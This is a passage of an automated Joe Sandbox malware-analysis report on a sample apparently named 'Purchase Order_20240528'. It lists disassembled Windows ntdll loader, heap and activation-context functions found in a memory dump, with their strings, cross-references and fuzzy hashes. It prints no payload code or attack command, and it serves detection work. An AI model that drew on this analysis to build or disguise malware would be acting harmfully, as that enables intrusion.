                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  • API String ID: 0-3223716464
                                  • Opcode ID: 908345a339b8505ae951b4719fa6e17eb1dd3f4434eaa80ad38869b85c57c1b1
                                  • Instruction ID: 9a191cfd6b33865fabc173689e91e6ea376de7681248115970e6758456dd1158
                                  • Opcode Fuzzy Hash: 908345a339b8505ae951b4719fa6e17eb1dd3f4434eaa80ad38869b85c57c1b1
                                  • Instruction Fuzzy Hash: 5A911272A42712AFD721EF78CC90B5A7BADBBA4B14F04445CFA426F644C770AC05CBA5
                                  Function 0160245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                  Download Yara Rule
                                  Strings
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0164A992
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0164A9A2
                                  • LdrpDynamicShimModule, xrefs: 0164A998
                                  • apphelp.dll, xrefs: 01602462
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-176724104
                                  • Opcode ID: 76eb4f6f6ec14934da9e61e079a6b96cbe69b65ce7fe9ff87f91a2506f6a2a59
                                  • Instruction ID: 4cb74187eb240cf4043e0ed6cda8de52d9cac5990ad30b2ef8bbea45e77a466c
                                  • Opcode Fuzzy Hash: 76eb4f6f6ec14934da9e61e079a6b96cbe69b65ce7fe9ff87f91a2506f6a2a59
                                  • Instruction Fuzzy Hash: AC3146B5E91202BBDB359F9DCC85A6AB7B5FB84B00F17001DE9026B345C7B05892C790
                                  Function 015EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  • API String ID: 0-1109411897
                                  • Opcode ID: 493aec505ef7f5ddff60759fe4f2959b72b5db4cb8fb81cc509ba40c057b2781
                                  • Instruction ID: e1570e4b1b38af83355ac08c4343769a63b04cbbb0fea3819e650a01940e5f0c
                                  • Opcode Fuzzy Hash: 493aec505ef7f5ddff60759fe4f2959b72b5db4cb8fb81cc509ba40c057b2781
                                  • Instruction Fuzzy Hash: 7DA21774E0562A8FDB68DF19CD997A9BBF5FB45304F1442EAD909AB250DB309E81CF00
                                  Function 016163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-792281065
                                  • Opcode ID: a5e45dff091d42f2fe938a5c01c6ef200fc754fb9ab1d7748ee4ce50856f5548
                                  • Instruction ID: f6759c52eadf8bf71668481b3d0e03ae160183f7ae6b11b42aeec441e631e1ef
                                  • Opcode Fuzzy Hash: a5e45dff091d42f2fe938a5c01c6ef200fc754fb9ab1d7748ee4ce50856f5548
                                  • Instruction Fuzzy Hash: 40916871F423229BDB35DF58DC44BAA7BB2BB40B14F04805CED016B785EBB09842C795
                                  Function 01612674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() passed the empty activation context, xrefs: 01652165
                                  • RtlGetAssemblyStorageRoot, xrefs: 01652160, 0165219A, 016521BA
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01652178
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01652180
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0165219F
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016521BF
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  • API String ID: 0-861424205
                                  • Opcode ID: 20b9020f5b2118b4a209046d268d4a3988a951930a84623958d8e76456222be4
                                  • Instruction ID: f13187491160a52cad81ed6a0e8af6d00ec1a6c432fa03fcce4a3af2d3ea0746
                                  • Opcode Fuzzy Hash: 20b9020f5b2118b4a209046d268d4a3988a951930a84623958d8e76456222be4
                                  • Instruction Fuzzy Hash: 78310636A40215ABE7218EDADCA1F6B7A69EB54E50F19405DBB046B244D7709A01CBA0
                                  Function 0161C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                  Download Yara Rule
                                  Strings
                                  • Loading import redirection DLL: '%wZ', xrefs: 01658170
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01658181, 016581F5
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 016581E5
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0161C6C3
                                  • LdrpInitializeImportRedirection, xrefs: 01658177, 016581EB
                                  • LdrpInitializeProcess, xrefs: 0161C6C4
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 0-475462383
                                  • Opcode ID: 8fa702729dbc40b361d532254f067679010342f0914f1cef5adbb71fabd6364d
                                  • Instruction ID: 0f1cd5012fefb30ae273b6568c9275a35de051e3755afce5dbb2649db9fe4dab
                                  • Opcode Fuzzy Hash: 8fa702729dbc40b361d532254f067679010342f0914f1cef5adbb71fabd6364d
                                  • Instruction Fuzzy Hash: 153104716447169FC324EF69DC45E2A77A5BF94B10F05095CFD806B391E720EC04C7A6
                                  Function 015F0770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: e91fad08b7096ba9e3b45c36c9a7303b4b0ed287b283c8bcfe5eb9ce5787a404
                                  • Instruction ID: d5b76cb1ea800d229ccae8aa852007dec9f4ed07f787f5101e91a02753b14b68
                                  • Opcode Fuzzy Hash: e91fad08b7096ba9e3b45c36c9a7303b4b0ed287b283c8bcfe5eb9ce5787a404
                                  • Instruction Fuzzy Hash: 9DF1BF30A01606DFEB25CF68C994B6AB7F6FF44704F1885ADE6169B392D730E941CB90
                                  Function 01600BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • Failed to allocated memory for shimmed module list, xrefs: 0164A10F
                                  • LdrpCheckModule, xrefs: 0164A117
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0164A121
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-161242083
                                  • Opcode ID: bee4a7390112cca1c1b00cea1d15da7992ccc49041a605e8e50c5de7fc99144b
                                  • Instruction ID: e91d5cf8b0d0cc8cb65a6378a0bb8f6fb1ca77a256a9e32b5918faddf3ac6089
                                  • Opcode Fuzzy Hash: bee4a7390112cca1c1b00cea1d15da7992ccc49041a605e8e50c5de7fc99144b
                                  • Instruction Fuzzy Hash: 9471C171E402069FDB2ADFA8CD81BAEB7F5FB48644F15402DE506DB351E734A942CB50
                                  Function 0161C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 016582DE
                                  • Failed to reallocate the system dirs string !, xrefs: 016582D7
                                  • minkernel\ntdll\ldrinit.c, xrefs: 016582E8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-1783798831
                                  • Opcode ID: c3d327b624eb42be398b625644fba0b6e5f12d93668cc97940d2348ad223e348
                                  • Instruction ID: 5d8f0b9bdaf34fcf2ff248550fad74f7eb2e70366c86f329f48f1d3ae0c39afc
                                  • Opcode Fuzzy Hash: c3d327b624eb42be398b625644fba0b6e5f12d93668cc97940d2348ad223e348
                                  • Instruction Fuzzy Hash: C841F1B1951312ABD721EB69DC44B6B7BE8FF84750F04482EF944D7294E7B0D800CB92
                                  Function 01664755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01664888
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01664899
                                  • LdrpCheckRedirection, xrefs: 0166488F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  • API String ID: 3446177414-3154609507
                                  • Opcode ID: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                                  • Instruction ID: 3f32c0e1e4fbdbfc9568f0a73c85dba48647fb69d96aeff8c652237d210d989a
                                  • Opcode Fuzzy Hash: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                                  • Instruction Fuzzy Hash: CE41D132A056519FCB21CE6CDD40A66BFEDBF8AA90F06056DED49DB351DB30E810CB91
                                  Function 0162096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 01622DF0: LdrInitializeThunk.NTDLL ref: 01622DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01620D74
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  • API String ID: 1404860816-0
                                  • Opcode ID: 0024e2b11792d85b938444472787c45bfac417f1b839533ed49c7dc6b2a9384c
                                  • Instruction ID: 12d020c000f2aeb2d810c074dcc9be137e94660894c7980ff08151b4274819b7
                                  • Opcode Fuzzy Hash: 0024e2b11792d85b938444472787c45bfac417f1b839533ed49c7dc6b2a9384c
                                  • Instruction Fuzzy Hash: 2F425A75900715DFDB61CF28CC80BAAB7F5BF44314F1485AAE989EB241E770AA85CF60
                                  Function 016BB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 6b913e924d44ac6cfcd0933bcddb9cf5a2ac0663e8699a3bba1ca37d4b52f95c
                                  • Instruction ID: a48f6148ad602d4ee79c401f589cb04ff18b49ee00d8367d8d24eb9d0aa82c2e
                                  • Opcode Fuzzy Hash: 6b913e924d44ac6cfcd0933bcddb9cf5a2ac0663e8699a3bba1ca37d4b52f95c
                                  • Instruction Fuzzy Hash: 1EF1F572E006118BCB18CF6DCDD06BEBBF6AF98210719816DD856DB385E734E981CB50
                                  Function 015E04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • kLsE, xrefs: 015E0540
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015E063D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  • API String ID: 3446177414-2547482624
                                  • Opcode ID: 0d9a80e11528e64fa055cdaf855a6463cee4ed8f5993f5ac7de1e28c6dbcd953
                                  • Instruction ID: 5f70e8b770cf9fda9721c06aa55b128ff9609da5bce332dea9a4654e61df063f
                                  • Opcode Fuzzy Hash: 0d9a80e11528e64fa055cdaf855a6463cee4ed8f5993f5ac7de1e28c6dbcd953
                                  • Instruction Fuzzy Hash: 1951A171A047429BD728DF68C4487A7B7E4BF84304F10483EE5DA8B281E7B0D545CF91
                                  Function 015EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  • API String ID: 0-379654539
                                  • Opcode ID: acd383981b6ba11aa9249a8402a66efd36ce335b7d0efb09cbc8b63907687da4
                                  • Instruction ID: 02c16db7e1591eafc466b29371b784da04c24253f1a0af0d9679e541811b151e
                                  • Opcode Fuzzy Hash: acd383981b6ba11aa9249a8402a66efd36ce335b7d0efb09cbc8b63907687da4
                                  • Instruction Fuzzy Hash: 38C18A75908382CFD729CF68C448B6AB7E4BF84704F04886EF9958F251E774C949CB66
                                  Function 01618402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                  Download Yara Rule
                                  Strings
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0161855E
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01618421
                                  • @, xrefs: 01618591
                                  • LdrpInitializeProcess, xrefs: 01618422
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-1918872054
                                  • Opcode ID: f7a2306e64640d35f3d408d1afa5e18f91a27714224af6778cea4fe35e472ea9
                                  • Instruction ID: 18eef4eafa4815632d2794f6c73015e160d155ca0d56c8c7977d9baedba398aa
                                  • Opcode Fuzzy Hash: f7a2306e64640d35f3d408d1afa5e18f91a27714224af6778cea4fe35e472ea9
                                  • Instruction Fuzzy Hash: D891B971508342AFD761DF25CC90FABBAECFF84684F44092EFA8596154E730D904CB62
                                  Function 0161273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() passed the empty activation context, xrefs: 016521DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016522B6
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016521D9, 016522B1
                                  • .Local, xrefs: 016128D8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  • API String ID: 0-1239276146
                                  • Opcode ID: bca73249ae3a099f5975f5b105afd04cb1219b2751b18c4603066ff26ad9e142
                                  • Instruction ID: e332e39a667280ff09de4201a588cb9cf855a72bd568cc637471dd655ebbe531
                                  • Opcode Fuzzy Hash: bca73249ae3a099f5975f5b105afd04cb1219b2751b18c4603066ff26ad9e142
                                  • Instruction Fuzzy Hash: 59A1BA3590022ADBDB24CF69CCA4BA9B7B1BF58354F2945EDD908AB355D7309E81CF80
                                  Function 01614AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                  Download Yara Rule
                                  Strings
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0165342A
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01653437
                                  • RtlDeactivateActivationContext, xrefs: 01653425, 01653432, 01653451
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01653456
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  • API String ID: 0-1245972979
                                  • Opcode ID: edd0b447249855132fc5164c6a902fabf26762873d904816b96f044d32582cd3
                                  • Instruction ID: 378b8359b8d445c78af1065744d7d8fa5cd27528e8daedee902c22c616b62f23
                                  • Opcode Fuzzy Hash: edd0b447249855132fc5164c6a902fabf26762873d904816b96f044d32582cd3
                                  • Instruction Fuzzy Hash: 43610E32651B129FD7228F1DCC81B2ABBE5BF80B90F19852DE9559F344DB30E802CB95
                                  Function 015E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                  Download Yara Rule
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0164106B
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016410AE
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01640FE5
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01641028
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  • API String ID: 0-1468400865
                                  • Opcode ID: ad2b38ee37c8d7cb82d567a7cc6a6320750d826d6915d6b37969d433920ce9d2
                                  • Instruction ID: 6a772b670b05456560a067584e37ad22e6fa896398638f3c19d54007ed03e5f9
                                  • Opcode Fuzzy Hash: ad2b38ee37c8d7cb82d567a7cc6a6320750d826d6915d6b37969d433920ce9d2
                                  • Instruction Fuzzy Hash: DA71AEB1A043159FCB21DF18CC88B9B7BE9AFA57A4F50086DF9488B246D734D588CF91
                                  Function 015F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                  Download Yara Rule
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 015F3255
                                  • HEAP: , xrefs: 015F3264
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015F327D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
